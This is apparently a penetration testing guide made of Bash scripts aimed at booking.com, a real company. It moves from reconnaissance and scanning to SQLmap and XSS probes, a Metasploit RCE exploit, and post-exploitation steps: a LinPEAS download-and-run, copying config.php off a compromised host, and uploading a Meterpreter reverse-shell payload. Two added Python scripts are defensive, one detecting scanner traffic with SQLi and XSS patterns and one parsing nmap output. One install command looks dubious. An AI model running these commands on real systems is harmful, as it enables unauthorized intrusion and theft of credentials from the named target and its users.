This guide outlines a detailed black-box pentesting methodology with Bash script samples, covering reconnaissance, scanning, exploitation, and post-exploitation. Tools such as Nessus, Subfinder, Nmap, Nikto, SQLmap, XSStrike, and Metasploit are used.
- Authorization: Ensure legal permission to test booking.com.
- Environment Setup: Install all necessary tools (see Common Tools).
- Documentation: Log all steps and findings for reporting.
Use OSINT techniques to gather information without actively interacting with the target.
```bash
#!/bin/bash
# Passive Recon Script
echo "[*] Starting passive reconnaissance on booking.com"

# WHOIS lookup
echo "[*] Running WHOIS lookup..."
whois booking.com > whois.txt

# Subdomain enumeration
echo "[*] Enumerating subdomains using Subfinder..."
subfinder -d booking.com -o subdomains.txt

# DNS record enumeration (many resolvers answer ANY with a minimal response, see RFC 8482)
echo "[*] Fetching DNS records..."
dig booking.com any > dns_records.txt

# Shodan search (the Shodan CLI must already be initialised with an API key)
echo "[*] Searching Shodan..."
shodan search "booking.com" > shodan_results.txt

echo "[*] Reconnaissance complete. Results saved to respective files."
```

```bash
#!/bin/bash
# Active Recon Script
echo "[*] Starting active reconnaissance on booking.com"

# Ping sweep (hosts are pinged in parallel; wait for all replies before continuing)
echo "[*] Performing ping sweep..."
for ip in $(seq 1 254); do
    ping -c 1 185.32.1.$ip | grep "bytes from" | cut -d " " -f 4 | tr -d ":" &
done
wait

# Nmap scanning (-sS requires root privileges)
echo "[*] Scanning for open ports with Nmap..."
nmap -sS -p- -T4 booking.com -oN nmap_full_scan.txt

echo "[*] Active reconnaissance complete."
```

- Tool: Nessus
- Open the Nessus GUI.
- Create a new scan for booking.com.
- Export results as nessus_scan_results.html.
```bash
# Nikto web server scan
nikto -h https://booking.com -output nikto_scan_results.txt
```

```bash
#!/bin/bash
# Enumeration Script
echo "[*] Enumerating directories and files using Gobuster..."
gobuster dir -u https://booking.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster_results.txt

echo "[*] Running SSL/TLS check with SSLScan..."
sslscan booking.com > sslscan_results.txt
```

```bash
# SQL injection testing with SQLmap (--batch accepts default answers, --dbs enumerates databases)
sqlmap -u "https://booking.com/search?query=hotel" --batch --dbs
```

```bash
# XSS testing with XSStrike (XSStrike has no -o option; results are written to the file given by --log-file)
xsstrike -u "https://booking.com/search?query=<script>alert('XSS')</script>" --log-file xsstrike_results.txt
```
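The Gobuster, SQLmap and XSStrike runs above leave a characteristic trace in the target's web server access log: bursts of 404s from one address, scanner user-agent strings, and quote/script payloads in query strings. The following Python script is an added example (not part of the original guide) showing how a defender can flag that activity. It assumes Apache/nginx combined log format; the log lines, the 203.0.113.x / 198.51.100.x addresses and the user-agent strings are constructed samples, and the 404 threshold is an arbitrary assumption to tune per site.

```python
"""Flag web-scanner activity (directory brute-forcing, SQL injection and XSS
probing) in combined-format access logs."""
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Constructed sample log lines (not real traffic; documentation addresses only).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /admin HTTP/1.1" 404 162 "-" "gobuster/3.6"
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /backup HTTP/1.1" 404 162 "-" "gobuster/3.6"
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /config HTTP/1.1" 404 162 "-" "gobuster/3.6"
203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /test HTTP/1.1" 404 162 "-" "gobuster/3.6"
203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /old HTTP/1.1" 404 162 "-" "gobuster/3.6"
203.0.113.7 - - [01/Jan/2024:10:01:00 +0000] "GET /search?query=hotel%27%20AND%201%3D1--%20 HTTP/1.1" 200 5120 "-" "sqlmap/1.7"
203.0.113.9 - - [01/Jan/2024:10:02:00 +0000] "GET /search?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.2 - - [01/Jan/2024:10:03:00 +0000] "GET /search?query=hotel HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Default user-agent strings sent by common scanners (assumed; tools can change them).
SCANNER_UA = re.compile(r"gobuster|sqlmap|nikto|xsstrike|dirbuster", re.I)
# A quote followed by boolean/union/time-based SQL keywords, after URL decoding.
SQLI_PATTERN = re.compile(r"('|%27).*(\bor\b|\band\b|union|sleep\(|--)", re.I)
# Script tags and inline event handlers, after URL decoding.
XSS_PATTERN = re.compile(r"<script|javascript:|onerror\s*=|onload\s*=", re.I)
NOT_FOUND_THRESHOLD = 5  # assumed: 404s from one IP before we call it brute-forcing


def parse_line(line):
    """Return the log fields as a dict, or None for lines that do not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(log_text, not_found_threshold=NOT_FOUND_THRESHOLD):
    """Return {ip: [alert names]} for source addresses showing scanner behaviour."""
    alerts = defaultdict(set)
    not_found = Counter()
    for raw in log_text.splitlines():
        entry = parse_line(raw)
        if entry is None:
            continue
        ip, status, ua = entry["ip"], int(entry["status"]), entry["ua"]
        decoded = unquote_plus(entry["path"])  # inspect the decoded query, not the raw bytes
        if SCANNER_UA.search(ua):
            alerts[ip].add("scanner-user-agent")
        if status == 404:
            not_found[ip] += 1
            if not_found[ip] >= not_found_threshold:
                alerts[ip].add("dir-bruteforce")
        if SQLI_PATTERN.search(decoded):
            alerts[ip].add("sqli-probe")
        if XSS_PATTERN.search(decoded):
            alerts[ip].add("xss-probe")
    return {ip: sorted(names) for ip, names in alerts.items()}


if __name__ == "__main__":
    for ip, names in detect(SAMPLE_LOG).items():
        print(ip, ", ".join(names))
```

The user-agent check is the weakest signal, since every tool above can spoof its agent string; the 404 burst and payload patterns are what a WAF or SIEM rule should key on, with the threshold tuned against normal traffic.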
```bash
#!/bin/bash
# Metasploit Automation Script
msfconsole -q -x "
use exploit/multi/http/phpmyadmin_lfi_rce;
set RHOSTS booking.com;
set RPORT 80;
set TARGETURI /;
exploit;
"
```

```bash
# Post-exploitation: fetch and run LinPEAS on the compromised host
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
```

```bash
# Copy a configuration file from the compromised host
scp [email protected]:/var/www/html/config.php ./exfiltrated_config.php
```

```bash
# Generate a PHP Meterpreter payload and upload it
msfvenom -p php/meterpreter_reverse_tcp LHOST=<your_ip> LPORT=4444 -f raw > shell.php
curl -X POST -F "[email protected]" https://booking.com/upload
```

- Document Findings:
  - Include results from all tools (e.g., whois.txt, nmap_full_scan.txt, nessus_scan_results.html).
- Recommendations:
  - Provide actionable fixes (e.g., WAF setup, input validation, patch management).
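For the Document Findings step, the raw nmap_full_scan.txt produced earlier is easier to report on once parsed. The following Python script is an added example, not part of the original guide: it parses nmap's normal (-oN) output format, which the -oN flag above writes, and renders the open ports as a markdown table like the one used for the tool list. The sample output is constructed (example.test and 192.0.2.10 are documentation placeholders, not results of any real scan).

```python
"""Parse nmap normal (-oN) output into structured findings for the report."""
import re

# Constructed sample of nmap -oN output (not a real scan of any host).
SAMPLE_NMAP_OUTPUT = """\
# Nmap 7.94 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -sS -p- -T4 -oN nmap_full_scan.txt example.test
Nmap scan report for example.test (192.0.2.10)
Host is up (0.012s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   open   http
443/tcp  open   https
8080/tcp closed http-proxy

# Nmap done at Mon Jan  1 00:05:00 2024 -- 1 IP address (1 host up) scanned in 300.00 seconds
"""

# "Nmap scan report for <name> (<ip>)"; the parenthesised IP is absent when a bare IP was scanned.
HOST_RE = re.compile(r"^Nmap scan report for (\S+)(?: \(([\d.]+)\))?")
# "<port>/<proto>   <state>   <service>" rows of the port table.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_nmap_normal(text):
    """Return a list of {host, ip, ports: [{port, proto, state, service}]} per scanned host."""
    hosts = []
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = {"host": m.group(1), "ip": m.group(2) or m.group(1), "ports": []}
            hosts.append(current)
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            current["ports"].append({
                "port": int(m.group(1)),
                "proto": m.group(2),
                "state": m.group(3),
                "service": m.group(4),
            })
    return hosts


def open_ports(hosts):
    """Flatten the parsed hosts to (host, port, service) tuples for open ports only."""
    return [(h["host"], p["port"], p["service"])
            for h in hosts for p in h["ports"] if p["state"] == "open"]


def findings_table(hosts):
    """Render the open ports as a markdown table for the report."""
    rows = ["| Host | Port | Service |", "|---|---|---|"]
    rows += [f"| {h} | {p} | {s} |" for h, p, s in open_ports(hosts)]
    return "\n".join(rows)


if __name__ == "__main__":
    print(findings_table(parse_nmap_normal(SAMPLE_NMAP_OUTPUT)))
```

To use it on a real scan, read nmap_full_scan.txt into a string and pass it to parse_nmap_normal; closed and filtered ports stay in the parsed structure, so a fuller report can list them separately from the open ones.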
| Tool | Purpose | Installation Command |
|---|---|---|
| Subfinder | Subdomain enumeration | sudo apt install subfinder |
| Nmap | Network scanning | sudo apt install nmap |
| Nikto | Web server vulnerability scanning | sudo apt install nikto |
| SQLmap | SQL injection testing | sudo apt install sqlmap |
| XSStrike | XSS vulnerability testing | pip install xsstrike |
| Metasploit | Exploitation framework | curl https://raw.githubusercontent.com/rapid7/metasploit/master/configure.sh |
| Gobuster | Directory brute-forcing | sudo apt install gobuster |
| LinPEAS | Privilege escalation checker | wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh |
This methodology is for ethical penetration testing and educational purposes only.